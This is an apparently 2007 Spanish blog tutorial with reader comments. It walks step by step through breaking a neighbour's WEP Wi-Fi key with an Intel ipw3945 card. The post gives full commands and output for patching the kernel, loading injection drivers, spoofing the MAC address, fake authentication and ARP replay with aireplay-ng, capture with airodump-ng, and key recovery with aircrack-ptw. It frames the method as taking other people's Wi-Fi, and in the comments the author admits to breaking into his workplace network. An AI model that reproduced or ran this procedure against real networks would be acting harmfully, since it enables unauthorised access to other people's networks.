Inyeccion con ipw3945, ¡hola wifi del vecino!

Pues hasta no hace mucho nos resultaba imposible a los poseedores de una tarjeta wifi con chip ipw3945 de intel hacer un inyección a la hora de saltarse la encriptación wep de una wifi, ahora ya es posible con unos drivers especificos, los ipwraw y parcheando el kernel. A continuación os explicaré como configurar la tarjeta y como proceder a sacar la clave. Ojo con lo que haceis….

Lo primero es algo de teoria. Para optener la clave de un wifi necesitamos una buena cantidad de datos provinientes del router objetivo, para ello, necesitamos que haya un buen tráfico de datos, lo cual rara vez se da, por tanto procederemos nosotros a forzar dicho tráfico, la llamada inyección.
Una vez tengamos estos datos, procederemos a analizarlos y optener el pass.
Vamos a instalar todas las herramientas:
emerge dev-util/git aircrack-ng aircrack-ptw wireless-tools macchanger

Git: es un sistema de descarga de sources, algo así como el svn… No se muy bien como funciona, pero lo necesitamos para ipwraw. Aseguraros que tenga la USE curl, pues de lo contrario no tendria acceso a webs.
Aircrack-ng: Paquete básico para herramientas de optención de claves
Aircrack-ptw: Este programa mejora considerablemente el programa aircrak de paquete aircrak-ng.
Wireless-tools: Conjunto de aplicaciones para conectar a redes con wep
Macchanger: Como su nombre indica, permite cambiar la mac.

También debeis tener un kernel 2.6.20 o superior.

Una vez tengamos todo, procederemos a optener el parche para el kernel y los drivers.

Para eso, hacemos una carpeta y descargamos todo

mkdir wifi
cd wifi
git clone http://intellinuxwireless.org/repos/ipwraw.git
git clone http://intellinuxwireless.org/repos/mac80211.git

Esperamos a que se baje… ya tenemos todo, ahora aplicamos el parche:

cd mac80211
make patch_kernel
cd /usr/src/linux
make menuconfig

Vamos a networking y deberiamos tener:
Generic IEEE 802.11 Networking Stack (dscape) (NEW)

Lo marcamos como módulo, salimos, compilamos y reiniciamos para cargar el nuevo kernel chachi lerendi.

Ahora debemos instalar los drivers ipwraw.
cd wifi
cd ipwraw
make
make install

Deberian de instalarse sin problemas, de lo contrario, vigilad que esté bien parcheado y cosas así.

Ahora debemos buscar nuestra victima cuando aún tenemos los drivers normales, para eso:
iwlist eth1 scan

Cambiad eth1 por vuestro dispositivo (wlan0, eth0…)

eth1 Scan completed :
Cell 01 – Address: 00:0F:21:DC:50:96
ESSID:”XXXX”
Protocol:IEEE 802.11bg
Mode:Master
Channel:6
Frequency:2.437 GHz (Channel 6)
Encryption key:on
Bit Rates:1 Mb/s; 2 Mb/s; 5.5 Mb/s; 6 Mb/s; 9 Mb/s
11 Mb/s; 12 Mb/s; 18 Mb/s; 24 Mb/s; 36 Mb/s
48 Mb/s; 54 Mb/s
Quality=82/100 Signal level=-54 dBm Noise level=-52 dBm
Extra: Last beacon: 8ms ago

Nos fijamos en el Channel, en este caso, el 6 y el andress.

Ahora, quitamos los drivers para cargar los otros:
/etc/init.d/ipw3945d stop
rmmod ipw3945

Y cargamos los nuevos
modprobe ipwraw rtap_iface=1 channel=X

Cambiamos la X por el canal.
Al hacer iwconfig nos deberian de aparecer dos dispositivos nuevos sin soporte wifi (apesar de lo contrario)

Sheik ipwraw # iwconfig
lo no wireless extensions.

eth0 no wireless extensions.

sit0 no wireless extensions.

eth1 no wireless extensions.

rtap0 no wireless extensions.

eth1 y rtap0 en mi caso (rtap0 siempre será igual)

Rtap0 será el encargado de recibir los datos y el otro de inyectar.

Ahora, debemos modificar unos parametros para centrarnos en el ataque:

nano /sys/class/net/eth1/device/bssid

y cambiamos los 00s por el andress que teniamos de antes.
Fijarse en el eth1 debe cambiarse por vuestro dispositivo.

Y ahora:
nano /sys/class/net/eth1/device/rate

Y lo cambiamos por 2.

Cambiamos nuestra mac (por si las moscas)

macchanger eth1 -m 00:11:22:33:44:55

Por ultimo, levantamos la red

ifconfig eth1 up

Ya está todo listo, ahora empieza lo dibertido.

A capturar:

airodump-ng -w wifi -c X rtap0

La X se cambia por el canal, wifi es nombre del archivo donde se guardaran, poned lo que querais.

Tendremos algo asi.

CH 6 ][ Elapsed: 4 s ][ 2007-07-26 12:32

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ES

00:0F:21:DC:50:96 0 100 53 0 0 6 48 WEP WEP N

BSSID STATION PWR Lost Packets Probes

Abrimos otra terminal, ahora debemos loggearnos dentro del router para poder inyectar.

aireplay-ng -1 10 -e ESSID -a ANDRESS -h NUESTRAMAC eth1

El ESSID es el nombre de la red y la mac debemos poner la falsa.
Optendremos algo asi:

Sheik ipwraw # aireplay-ng -1 0 -e XXXX -a 00:0F:21:DC:50:96 -h 00:11:22:33:44:55 eth1
12:44:41 Waiting for beacon frame (BSSID: 00:0F:21:DC:50:96)
12:44:41 Sending Authentication Request
12:44:42 Authentication successful
12:44:42 Sending Association Request
12:44:42 Association successful🙂

Ya estamos logeados, si nos vamos al de captura veremos esto:

CH 6 ][ Elapsed: 3 mins ][ 2007-07-26 12:46

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:0F:21:DC:50:96 0 100 2247 29 0 6 48 WEP WEP OPN XXXX

BSSID STATION PWR Lost Packets Probes

00:0F:21:DC:50:96 00:11:22:33:44:55 0 0 13

Hemos aparecido!

Ahora, a inyectar!

aireplay-ng -3 -b ANDRESS -h 00:11:22:33:44:55 eth1

Sheik link # aireplay-ng -3 -b 00:0F:21:DC:50:96 -h 00:11:22:33:44:55 eth1
Saving ARP requests in replay_arp-0726-124751.cap
You should also start airodump-ng to capture replies.
Read 26 packets (got 0 ARP requests), sent 0 packets…(0 pps)

Ahora debemos esperar un buen rato, dependindo de la red tardará más o menos…

Vamos a donde estamos viendo los datos y donde pone Data debemos encontrarnos con unos 50000 datos minimo.

CH 6 ][ Elapsed: 6 mins ][ 2007-07-26 12:53

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:0F:21:DC:50:96 0 89 3736 63494 223 6 48 WEP WEP OPN XXXX

BSSID STATION PWR Lost Packets Probes

00:0F:21:DC:50:96 00:11:22:33:44:55 0 1124 68663
En este caso, tengo 63494 y lo ha pillado rapidisimo. Ahora le damos caña al aircrack-ptw

Sheik link # aircrack-ptw wifi-01.cap
This is aircrack-ptw 1.0.0
For more informations see http://www.cdc.informatik.tu-darmstadt.de/aircrack-ptw/
allocating a new table
bssid = 00:0F:21:DC:50:96 keyindex=0
stats for bssid 00:0F:21:DC:50:96 keyindex=0 packets=63502
Found key with len 13: 9C BC C6 85 4C EB F5 0C 06 66 9B A3 25

Ya está, la tenemos en hexadecimal lista para insertar😀

Venga, a ver que haceis con esta guia para “recuperar tu clave”….

8 respuestas a Inyeccion con ipw3945, ¡hola wifi del vecino!

  1. Sor BeteLimón dice:

    Así que eres tú quién me está chupando la banda pues mira ahora pongo la WAP y si te pusieras duro con cortar cuando no uso toma que soy !!!

  2. elchicosinhada dice:

    Em… eres?

    Solo me he saltado la red del curro (y en plan desafío)…

  3. Alikuekano dice:

    Si cuendo digo yo que el WEP es una basura no me equivoco jajajajaja.

    Si codificas una widi o lo haces bien hecho y no lo hagas, si total jajajaja.

  4. Sanguinarius dice:

    buen tutorial, te keria preguntar de casualidad no tendras un script ke cambie los drivers, y pues tembien keria saber que haces para realizar un ataque uno exitoso? de hecho nunca habia tenido este problema con otras tarjetas, pero con la ipw3945 no me deja hacer el atake 1, mmm de hecho lo he logrado hasta en 4 min antes ke saliera el ptw
    jejeje
    a ver si te comunicas y discutimos algunas cosas

  5. elchicosinhada dice:

    La unica manera de conseguir el ataque 1 es usar estos drivers, con los ipw3945 no se puede. En cuanto a un script… todavia no los controlo bien, pero basicamente es cortar unos y cargar los otros con modprobe…

  6. DaRkNeSS dice:

    una pregunta si en ves de tener un chipset atheros tengo un RealAtek o ra0 como le hago para inyectar?

  7. elchicosinhada dice:

    Pues eso ya depende de cada chipset, algunos no hace falta modificar los drivers, con los normales funcionan perfectamente, otros, como la mia hay que instalarle unos especificos y ciertas tarjetas no lo permiten directamente,

  8. raquel dice:

    problemillas al ejecutar patch_kernel.

    Cuando ejecuto dicho instrucción me da el siguiente error:
    KERNEL MAKEFILE NOT FOUND AT ‘/LIB/MODULES/2.6.18-6-686\SOURCE’
    IF PATCH OR SCRIPT FAILED, CHECK PRE/ AND POST/ FOR CURRENT STAGE.
    ¿POQRUE PUEDE SER ESO?

Responder

Introduce tus datos o haz clic en un icono para iniciar sesión:

Logo de WordPress.com

Estás comentando usando tu cuenta de WordPress.com. Cerrar sesión / Cambiar )

Imagen de Twitter

Estás comentando usando tu cuenta de Twitter. Cerrar sesión / Cambiar )

Foto de Facebook

Estás comentando usando tu cuenta de Facebook. Cerrar sesión / Cambiar )

Google+ photo

Estás comentando usando tu cuenta de Google+. Cerrar sesión / Cambiar )

Conectando a %s

A %d blogueros les gusta esto: